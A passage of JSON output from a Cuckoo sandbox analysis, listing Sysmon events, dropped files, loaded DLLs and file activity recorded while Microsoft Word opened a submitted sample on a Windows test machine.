"TargetProcessGuid":"{532A224E-5858-5C76-0000-00101B570000}",
"provider_name":"Microsoft-Windows-Sysmon",
"channel":"Microsoft-Windows-Sysmon/Operational",
"SourceImage":"C:\\tmp7vkpxh\\bin\\inject-x64.exe"
},
{
"eventid":"18",
"ProcessId":"468",
"task":"18",
"computer":"XxfUNrINQT",
"level":"4",
"provider_guid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
"Image":"C:\\Windows\\system32\\lsass.exe",
"UtcTime":"2020-12-09 14:53:20.437",
"version":"1",
"opcode":"0",
"eventrecordid":"1079",
"ProcessGuid":"{532A224E-5858-5C76-0000-00101B570000}",
"provider_name":"Microsoft-Windows-Sysmon",
"channel":"Microsoft-Windows-Sysmon/Operational",
"PipeName":"\\IuldaMUFnSVyupNnX"
},
{
"eventid":"18",
"ProcessId":"468",
"task":"18",
"computer":"XxfUNrINQT",
"level":"4",
"provider_guid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
"Image":"C:\\Windows\\system32\\lsass.exe",
"UtcTime":"2020-12-09 14:53:20.500",
"version":"1",
"opcode":"0",
"eventrecordid":"1082",
"ProcessGuid":"{532A224E-5858-5C76-0000-00101B570000}",
"provider_name":"Microsoft-Windows-Sysmon",
"channel":"Microsoft-Windows-Sysmon/Operational",
"PipeName":"\\JxDOUdwgxxclEEFXfMvNJ"
},
{
"eventid":"12",
"ProcessId":"1232",
"task":"12",
"computer":"XxfUNrINQT",
"level":"4",
"provider_guid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
"EventType":"CreateKey",
"Image":"C:\\Windows\\Explorer.EXE",
"TargetObject":"HKU\\S-1-5-21-833868587-807431736-2077290444-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.",
"UtcTime":"2020-12-09 14:53:20.578",
"version":"2",
"opcode":"0",
"eventrecordid":"1084",
"ProcessGuid":"{532A224E-5859-5C76-0000-00109F1F0100}",
"provider_name":"Microsoft-Windows-Sysmon",
"channel":"Microsoft-Windows-Sysmon/Operational"
},
{
"eventid":"12",
"ProcessId":"1232",
"task":"12",
"computer":"XxfUNrINQT",
"level":"4",
"provider_guid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
"EventType":"CreateKey",
"Image":"C:\\Windows\\Explorer.EXE",
"TargetObject":"HKU\\S-1-5-21-833868587-807431736-2077290444-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.\\OpenWithList",
"UtcTime":"2020-12-09 14:53:20.578",
"version":"2",
"opcode":"0",
"eventrecordid":"1085",
"ProcessGuid":"{532A224E-5859-5C76-0000-00109F1F0100}",
"provider_name":"Microsoft-Windows-Sysmon",
"channel":"Microsoft-Windows-Sysmon/Operational"
},
{
"eventid":"12",
"ProcessId":"1232",
"task":"12",
"computer":"XxfUNrINQT",
"level":"4",
"provider_guid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
"EventType":"CreateKey",
"Image":"C:\\Windows\\Explorer.EXE",
"TargetObject":"HKU\\S-1-5-21-833868587-807431736-2077290444-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.\\OpenWithList",
"UtcTime":"2020-12-09 14:53:20.609",
"version":"2",
"opcode":"0",
"eventrecordid":"1086",
"ProcessGuid":"{532A224E-5859-5C76-0000-00109F1F0100}",
"provider_name":"Microsoft-Windows-Sysmon",
"channel":"Microsoft-Windows-Sysmon/Operational"
},
{
"eventid":"12",
"ProcessId":"1232",
"task":"12",
"computer":"XxfUNrINQT",
"level":"4",
"provider_guid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
"EventType":"CreateKey",
"Image":"C:\\Windows\\Explorer.EXE",
"TargetObject":"HKU\\S-1-5-21-833868587-807431736-2077290444-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.\\OpenWithList",
"UtcTime":"2020-12-09 14:53:20.609",
"version":"2",
"opcode":"0",
"eventrecordid":"1087",
"ProcessGuid":"{532A224E-5859-5C76-0000-00109F1F0100}",
"provider_name":"Microsoft-Windows-Sysmon",
"channel":"Microsoft-Windows-Sysmon/Operational"
},
{
"eventid":"12",
"ProcessId":"1232",
"task":"12",
"computer":"XxfUNrINQT",
"level":"4",
"provider_guid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
"EventType":"CreateKey",
"Image":"C:\\Windows\\Explorer.EXE",
"TargetObject":"HKU\\S-1-5-21-833868587-807431736-2077290444-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.\\OpenWithList",
"UtcTime":"2020-12-09 14:53:20.625",
"version":"2",
"opcode":"0",
"eventrecordid":"1088",
"ProcessGuid":"{532A224E-5859-5C76-0000-00109F1F0100}",
"provider_name":"Microsoft-Windows-Sysmon",
"channel":"Microsoft-Windows-Sysmon/Operational"
},
{
"eventid":"12",
"ProcessId":"1232",
"task":"12",
"computer":"XxfUNrINQT",
"level":"4",
"provider_guid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
"EventType":"CreateKey",
"Image":"C:\\Windows\\Explorer.EXE",
"TargetObject":"HKU\\S-1-5-21-833868587-807431736-2077290444-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.\\OpenWithList",
"UtcTime":"2020-12-09 14:53:20.625",
"version":"2",
"opcode":"0",
"eventrecordid":"1089",
"ProcessGuid":"{532A224E-5859-5C76-0000-00109F1F0100}",
"provider_name":"Microsoft-Windows-Sysmon",
"channel":"Microsoft-Windows-Sysmon/Operational"
},
{
"TerminalSessionId":"1",
"computer":"XxfUNrINQT",
"eventrecordid":"1093",
"ProcessGuid":"{532A224E-E4E0-5FD0-0000-0010BD600400}",
"ProcessId":"2204",
"Product":"Microsoft Office 2016",
"Description":"Microsoft Word",
"Company":"Microsoft Corporation",
"ParentProcessGuid":"{532A224E-E4E0-5FD0-0000-00100F5F0400}",
"CurrentDirectory":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\",
"version":"5",
"User":"XXFUNRINQT\\Administrator",
"provider_name":"Microsoft-Windows-Sysmon",
"channel":"Microsoft-Windows-Sysmon/Operational",
"eventid":"1",
"ParentImage":"C:\\tmp7vkpxh\\bin\\inject-x86.exe",
"FileVersion":"16.0.4266.1001",
"ParentProcessId":"2128",
"provider_guid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
"CommandLine":"\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\cuckoo-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"LogonGuid":"{532A224E-5859-5C76-0000-0020F8EB0000}",
"Hashes":"SHA1=5A4C0D393429B8465587DBDBC95A06C0AB9341A0,MD5=82E2ADB7014E09D68173C70431D0A386,SHA256=19FFA53CF7DA081BA164C05F64AFF44FB9AFB620D5310C9F3D39DC70AB17F037",
"task":"1",
"LogonId":"0xebf8",
"level":"4",
"Image":"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE",
"IntegrityLevel":"High",
"ParentCommandLine":"bin\\inject-x86.exe --app \"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" --only-start --args C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\cuckoo-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c --curdir C:\\Users\\ADMINI~1\\AppData\\Local\\Temp",
"UtcTime":"2020-12-09 14:53:20.687",
"opcode":"0"
},
{
"eventid":"18",
"ProcessId":"2204",
"task":"18",
"computer":"XxfUNrINQT",
"level":"4",
"provider_guid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
"Image":"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE",
"UtcTime":"2020-12-09 14:53:21.234",
"version":"1",
"opcode":"0",
"eventrecordid":"1106",
"ProcessGuid":"{532A224E-E4E0-5FD0-0000-0010BD600400}",
"provider_name":"Microsoft-Windows-Sysmon",
"channel":"Microsoft-Windows-Sysmon/Operational",
"PipeName":"\\IuldaMUFnSVyupNnX"
},
{
"eventid":"18",
"ProcessId":"2204",
"task":"18",
"computer":"XxfUNrINQT",
"level":"4",
"provider_guid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
"Image":"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE",
"UtcTime":"2020-12-09 14:53:21.296",
"version":"1",
"opcode":"0",
"eventrecordid":"1110",
"ProcessGuid":"{532A224E-E4E0-5FD0-0000-0010BD600400}",
"provider_name":"Microsoft-Windows-Sysmon",
"channel":"Microsoft-Windows-Sysmon/Operational",
"PipeName":"\\JxDOUdwgxxclEEFXfMvNJ"
},
{
"TerminalSessionId":"1",
"computer":"XxfUNrINQT",
"eventrecordid":"1133",
"ProcessGuid":"{532A224E-E511-5FD0-0000-001080A00500}",
"ProcessId":"2636",
"Product":"Microsoft\\xae Windows\\xae Operating System",
"Description":"Host Process for Windows Tasks",
"Company":"Microsoft Corporation",
"ParentProcessGuid":"{532A224E-5858-5C76-0000-0010C4530000}",
"CurrentDirectory":"C:\\Windows\\system32\\",
"version":"5",
"User":"XXFUNRINQT\\Administrator",
"provider_name":"Microsoft-Windows-Sysmon",
"channel":"Microsoft-Windows-Sysmon/Operational",
"eventid":"1",
"ParentImage":"C:\\Windows\\System32\\services.exe",
"FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)",
"ParentProcessId":"452",
"provider_guid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
"CommandLine":"\"taskhost.exe\"",
"LogonGuid":"{532A224E-5859-5C76-0000-0020F8EB0000}",
"Hashes":"SHA1=61478D71931FB3E304BC341236AB0DB1D6C26E09,MD5=517110BD83835338C037269E603DB55D,SHA256=499A803DE14905F2FF7BCA56D81CC983E16A8D9CEA93EC4B84A06A366E7CB939",
"task":"1",
"LogonId":"0xebf8",
"level":"4",
"Image":"C:\\Windows\\System32\\taskhost.exe",
"IntegrityLevel":"High",
"ParentCommandLine":"C:\\Windows\\system32\\services.exe",
"UtcTime":"2020-12-09 14:54:09.375",
"opcode":"0"
}
],
"service_control_manager":[
],
"kernel_pnp":[
],
"security_audit":[
]
},
"dropped":[
{
"yara":[
],
"sha1":"0164aa100508579e1053cf2c12ea772d82447ac7",
"name":"105713c12fd7d3d7_custom.dic",
"filepath":"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC",
"type":"Little-endian UTF-16 Unicode text, with CRLF, CR line terminators",
"sha256":"105713c12fd7d3d7b6caef56596f7977ac2b0ca879e6e610b1bcba3e9e345642",
"urls":[
],
"crc32":"1795F699",
"path":"/root/.cuckoo/storage/analyses/4405/files/105713c12fd7d3d7_custom.dic",
"ssdeep":"3:QwMlAvWlnl+Sliol9:QwMlAvWn+Skol9",
"size":32,
"sha512":"e8ee84f0d2744175933e9270cac94a55cd0e4dd498da7527ac412e4fb8ad2822c354f1e03e159d65cd578ab64fea27a240489d99c32e5d38bf0b1c5f46486a5f",
"pids":[
2204
],
"md5":"bfccbaca2634caa9054cca88012635f4"
},
{
"yara":[
],
"sha1":"355a733630254c6cbf20cbc3697bea19cc1a7520",
"name":"c236b4cbd147a462_{d3ddaa78-0765-4141-9a1d-e4c5a1380e6e} (0) - 2204 - winword.exe - otele.dat",
"filepath":"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (0) - 2204 - winword.exe - OTele.dat",
"type":"data",
"sha256":"c236b4cbd147a462a7b22356908985de34b25e22ffd36a0e52ce370a0af88a03",
"urls":[
],
"crc32":"A556DB85",
"path":"/root/.cuckoo/storage/analyses/4405/files/c236b4cbd147a462_{d3ddaa78-0765-4141-9a1d-e4c5a1380e6e} (0) - 2204 - winword.exe - otele.dat",
"ssdeep":"6:dN4BfaDx0F4vR4/lt/RJ/MNLtFDyF6thQs27BhhQYyn0F3EBiln:UJaBe/TRyNLtFDy+S7lyziln",
"size":283,
"sha512":"bee0aa3e358ef01169fa29ca25f81c9288807ee85b1f63b42844fc82e503d2d1cf2d166a9429982bd93b8bed6dbb9a096195c68e758762693d5e5fc9379263e9",
"pids":[
2204
],
"md5":"e4fef7c89ed1e177dc3f398733904afc"
},
{
"yara":[
],
"sha1":"232c1b18ba953a062f6b990d2ad2bd71b796c2da",
"name":"ebd4d5db911b6cab_{d3ddaa78-0765-4141-9a1d-e4c5a1380e6e} (1) - 2204 - winword.exe - otele.dat",
"filepath":"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (1) - 2204 - winword.exe - OTele.dat",
"type":"data",
"sha256":"ebd4d5db911b6cab49396ef0622e21c730f31e444f7c62e23537ba35bf38d065",
"urls":[
],
"crc32":"775C3D6B",
"path":"/root/.cuckoo/storage/analyses/4405/files/ebd4d5db911b6cab_{d3ddaa78-0765-4141-9a1d-e4c5a1380e6e} (1) - 2204 - winword.exe - otele.dat",
"ssdeep":"12:UJaBe/TBicmm4cmXcmf58RDHhFWVRlO7Qk0pmmjm:UJweQs49LGLPUDiQx",
"size":551,
"sha512":"3940e22788c13b03d2507e006a83852a5edc07378d21e3320581d88d7be5bf4e7c0e945f40c023ba3eb54d2087452bf0705c9c6015eae5b9a8bd99826f2c226d",
"pids":[
2204
],
"md5":"b7aa36bf3ecc2adf70ade94e2ae28c49"
},
{
"yara":[
],
"sha1":"a07a4c2eb06199b1dc27dbbe41344f3dadeac24d",
"name":"184d84a2ba0d4b9f_{d3ddaa78-0765-4141-9a1d-e4c5a1380e6e} (0) - 2204 - winword.exe - otelemediumcost.dat",
"filepath":"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (0) - 2204 - winword.exe - OTeleMediumCost.dat",
"type":"data",
"sha256":"184d84a2ba0d4b9fa51b5ac8b81fe8fbe475cf4b04477df72d2b8f86ecd0038c",
"urls":[
],
"crc32":"B0A548BC",
"path":"/root/.cuckoo/storage/analyses/4405/files/184d84a2ba0d4b9f_{d3ddaa78-0765-4141-9a1d-e4c5a1380e6e} (0) - 2204 - winword.exe - otelemediumcost.dat",
"ssdeep":"12:UJaBe/TlBeN2/7a7a7a7gtqk/Pn5WlIy3lNjEYo7vn:UJwebaAmmmWqX33lJUvn",
"size":501,
"sha512":"03d6bc6a1bced916db7cd6fc2040de07324151496a5a9065d7b8d88ad86c11782f6919f7828d09d04b513615e1defb6d5486057d47767c7767646acd29f21681",
"pids":[
2204
],
"md5":"c8f5daa729cb99f3640510a84595e401"
},
{
"yara":[
],
"sha1":"66cf168aec697f1719b3882b10bd1adf9be2e4e0",
"name":"07f1a77eb80012f4_{d3ddaa78-0765-4141-9a1d-e4c5a1380e6e} (1) - 2204 - winword.exe - otelemediumcost.dat",
"filepath":"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (1) - 2204 - winword.exe - OTeleMediumCost.dat",
"type":"data",
"sha256":"07f1a77eb80012f4cd92ba295f7c35621972643daeff5191363962f28504a686",
"urls":[
],
"crc32":"9EEDAF21",
"path":"/root/.cuckoo/storage/analyses/4405/files/07f1a77eb80012f4_{d3ddaa78-0765-4141-9a1d-e4c5a1380e6e} (1) - 2204 - winword.exe - otelemediumcost.dat",
"ssdeep":"24:UJwefLX3t/rpKmlShU6P3t/rp0zP4pRnGzhGTITehz:OLfzywShUMfpBrhz",
"size":845,
"sha512":"73c52b26da1310943d4988ffbde4740de6b91477b09a231f2e329d9b5922e68d966a9d0c00313778f275f14d60776377806712d074acf974eb3c1252385924d1",
"pids":[
2204
],
"md5":"da46270514782f3ab7fbafc355ab7696"
}
],
"behavior":{
"file_created":[
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\UProof",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Proof",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS{7218FB01-892D-48EE-B002-23733AED8C9D}.tmp",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (0) - 2204 - winword.exe - OTele.dat",
"C:\\Users\\Administrator\\AppData\\Local\\Temp\\~$ckoo-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (1) - 2204 - winword.exe - OTeleMediumCost.dat",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (0) - 2204 - winword.exe - OTeleMediumCost.dat",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (1) - 2204 - winword.exe - OTele.dat",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{8E73F01D-96DC-434D-90DE-6B19C6E513F5}.tmp"
],
"file_recreated":[
"\\DEVICE\\NETBT_TCPIP_{4B7657A7-288B-4DFE-9B9A-468778C5BD00}",
"\\??\\Nsi",
"\\Device\\Afd\\Endpoint",
"\\Device\\KsecDD"
],
"dll_loaded":[
"C:\\Windows\\system32\\pnrpnsp.dll",
"DNSAPI.dll",
"C:\\Program Files (x86)\\Microsoft Office\\Office16\\msproof7.dll",
"UxTheme.dll",
"dwmapi.dll",
"cryptsp.dll",
"ncrypt.dll",
"API-MS-WIN-Service-Management-L2-1-0.dll",
"C:\\Windows\\SysWOW64\\bcryptprimitives.dll",
"SspiCli.dll",
"ole32.dll",
"SHLWAPI.dll",
"USER32.dll",
"C:\\Windows\\System32\\mswsock.dll",
"SHELL32.dll",
"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV",
"C:\\Windows\\System32\\wship6.dll",
"CFGMGR32.dll",
"dhcpcsvc6.DLL",
"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL",
"POWRPROF.dll",
"C:\\Windows\\System32\\wshtcpip.dll",
"IMM32.dll",
"urlmon.dll",
"C:\\Windows\\system32\\msctf.dll",
"apphelp.dll",
"Mso20Win32Client.dll",
"kernel32.dll",
"POWRPROF.DLL",
"ntdll.dll",
"C:\\Windows\\system32\\napinsp.dll",
"dwrite.dll",
"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL",
"rtutils.dll",
"Comctl32.dll",
"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV",
"C:\\Windows\\System32\\fwpuclnt.dll",
"C:\\Windows\\SysWOW64\\schannel.dll",
"IPHLPAPI.DLL",
"usp10.dll",
"RASAPI32.dll",
"profapi.dll",
"dhcpcsvc.DLL",
"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL",
"comctl32.dll",
"VERSION.dll",
"C:\\Windows\\SysWOW64\\oleaut32.dll",
"user32.dll",
"WINHTTP.dll",
"CRYPT32.dll",
"shlwapi.dll",
"iphlpapi",
"bcrypt.dll",
"C:\\Windows\\syswow64\\MSCTF.dll",
"USERENV.dll",
"CRYPTSP.dll",
"credssp.dll",
"API-MS-WIN-Service-winsvc-L1-1-0.dll",
"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\msconv97.dll",
"secur32.dll",
"sensapi.dll",
"NSI.dll",
"C:\\Windows\\system32\\NLAapi.dll",
"SXS.DLL",
"C:\\Program Files (x86)\\Microsoft Office\\OFFICE16\\PROOF\\1036\\MSGR8FR.DLL",
"VBE7.DLL",
"msi.dll",
"ADVAPI32.dll",
"WS2_32.dll",
"C:\\PROGRA~2\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL",
"webservices.dll",
"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV",
"winhttp.dll",
"API-MS-WIN-Service-Management-L1-1-0.dll",
"rasadhlp.dll",
"dnsapi",
"Secur32.dll",
"OLEAUT32.DLL",
"RASMAN.DLL",
"GPAPI.dll",
"API-MS-Win-Security-SDDL-L1-1-0.dll",
"wininet.dll",
"OLEAUT32.dll",
"RPCRT4.dll",
"C:\\Windows\\System32\\winrnr.dll",
"UIAutomationCore.DLL",
"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL",
"ws2_32",
"C:\\Windows\\system32\\mswsock.dll",
"Normaliz.dll"
],
"file_opened":[
"C:\\Windows\\Fonts\\arial.ttf",
"C:\\",
"C:\\Windows\\SysWOW64\\en-US\\CRYPT32.dll.mui",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\",
"C:\\Users\\Administrator\\Pictures\\desktop.ini",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml",
"C:\\Users\\Administrator\\AppData\\Local\\Temp\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} - OProcSessId.dat",
"C:\\Users\\Administrator\\Searches\\desktop.ini",
"C:\\Program Files (x86)\\Microsoft Office\\Office16\\",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS{7218FB01-892D-48EE-B002-23733AED8C9D}.tmp",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (0) - 2204 - winword.exe - OTele.dat",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{8E73F01D-96DC-434D-90DE-6B19C6E513F5}.tmp",
"C:\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui",
"C:\\Users\\Administrator\\Contacts\\desktop.ini",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{1E5BCE8D-C21F-441F-9065-C8F5E48795E1} (2) - 344 - winword.exe - OTele.dat",
"C:\\Users\\Administrator\\AppData\\",
"C:\\Windows\\System32\\oleaccrc.dll",
"C:\\Users\\Administrator\\Downloads\\desktop.ini",
"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\",
"C:\\Users\\Administrator\\AppData\\Local",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{1E5BCE8D-C21F-441F-9065-C8F5E48795E1} (1) - 344 - winword.exe - OTele.dat",
"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL",
"C:\\Windows\\Fonts\\arialbd.ttf",
"C:\\Users\\Administrator",
"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{1E5BCE8D-C21F-441F-9065-C8F5E48795E1} (0) - 344 - winword.exe - OTele.dat",
"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cuckoo-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSWORD.OLB",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My",
"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\",
"C:\\Users\\Administrator\\AppData\\Local\\Temp\\~$ckoo-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS{B7338D19-482B-4860-AF7E-61C06193AA6C}.tmp",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{1E5BCE8D-C21F-441F-9065-C8F5E48795E1} (1) - 344 - winword.exe - OTeleMediumCost.dat",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Proof\\",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\",
"C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA7.1\\VBE7.DLL",
"C:\\Users\\Administrator\\AppData",
"C:\\Windows\\System32\\en-US\\shdocvw.dll.mui",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{F4EF6C34-17D8-4AA7-A6BC-EDC5E61E3FDD} (0) - 1940 - winword.exe - OTeleMediumCost.dat",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\DB57337D-30FC-4438-9659-34FB78A01D45",
"C:\\Windows\\SysWOW64\\wininet.dll",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{F4EF6C34-17D8-4AA7-A6BC-EDC5E61E3FDD} (1) - 1940 - winword.exe - OTele.dat",
"C:\\Windows\\System32\\en-US\\tzres.dll.mui",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
"C:\\Windows\\Fonts\\calibri.ttf",
"C:\\Users\\Administrator\\AppData\\Local\\Temp\\",
"C:\\Windows\\AppPatch\\sysmain.sdb",
"C:\\Users\\Administrator\\Documents\\desktop.ini",
"C:\\Users\\",
"C:\\Users",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{F4EF6C34-17D8-4AA7-A6BC-EDC5E61E3FDD} (0) - 1940 - winword.exe - OTele.dat",
"C:\\Windows\\SysWOW64\\stdole2.tlb",
"C:\\Windows\\System32\\shdocvw.dll",
"C:\\Users\\desktop.ini",
"C:\\Users\\Administrator\\Favorites\\desktop.ini",
"C:\\Users\\Administrator\\Saved Games\\desktop.ini",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{F4EF6C34-17D8-4AA7-A6BC-EDC5E61E3FDD} (1) - 1940 - winword.exe - OTeleMediumCost.dat",
"C:\\Users\\Administrator\\Videos\\desktop.ini",
"C:\\Users\\Administrator\\",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (0) - 2204 - winword.exe - OTeleMediumCost.dat",
"C:\\Windows\\System32\\ras\\",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{1E5BCE8D-C21F-441F-9065-C8F5E48795E1} (0) - 344 - winword.exe - OTeleMediumCost.dat",
"C:\\Users\\Administrator\\AppData\\Local\\",
"C:\\Users\\Administrator\\AppData\\Local\\Temp",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\",
"C:\\Windows\\System32",
"C:\\Windows\\",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\",
"C:\\Windows\\System32\\tzres.dll",
"C:\\Users\\Administrator\\Music\\desktop.ini",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{F4EF6C34-17D8-4AA7-A6BC-EDC5E61E3FDD} (2) - 1940 - winword.exe - OTele.dat",
"C:\\Program Files (x86)\\",
"C:\\Users\\Administrator\\Links\\desktop.ini",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (1) - 2204 - winword.exe - OTeleMediumCost.dat",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC",
"C:\\Windows\\Fonts\\CalibriL.ttf",
"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Word\\",
"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL",
"C:\\Windows\\System32\\",
"C:\\Windows\\Fonts\\times.ttf"
],
"file_written":[
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS{7218FB01-892D-48EE-B002-23733AED8C9D}.tmp",
"C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Office\\OTele\\{D3DDAA78-0765-4141-9A1D-E4C5A1380E6E} (0) - 2204 - winword.exe - OTele.dat",
"C:\\Users\\Administrator\\AppData\\Local\\Temp\\~$ckoo-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
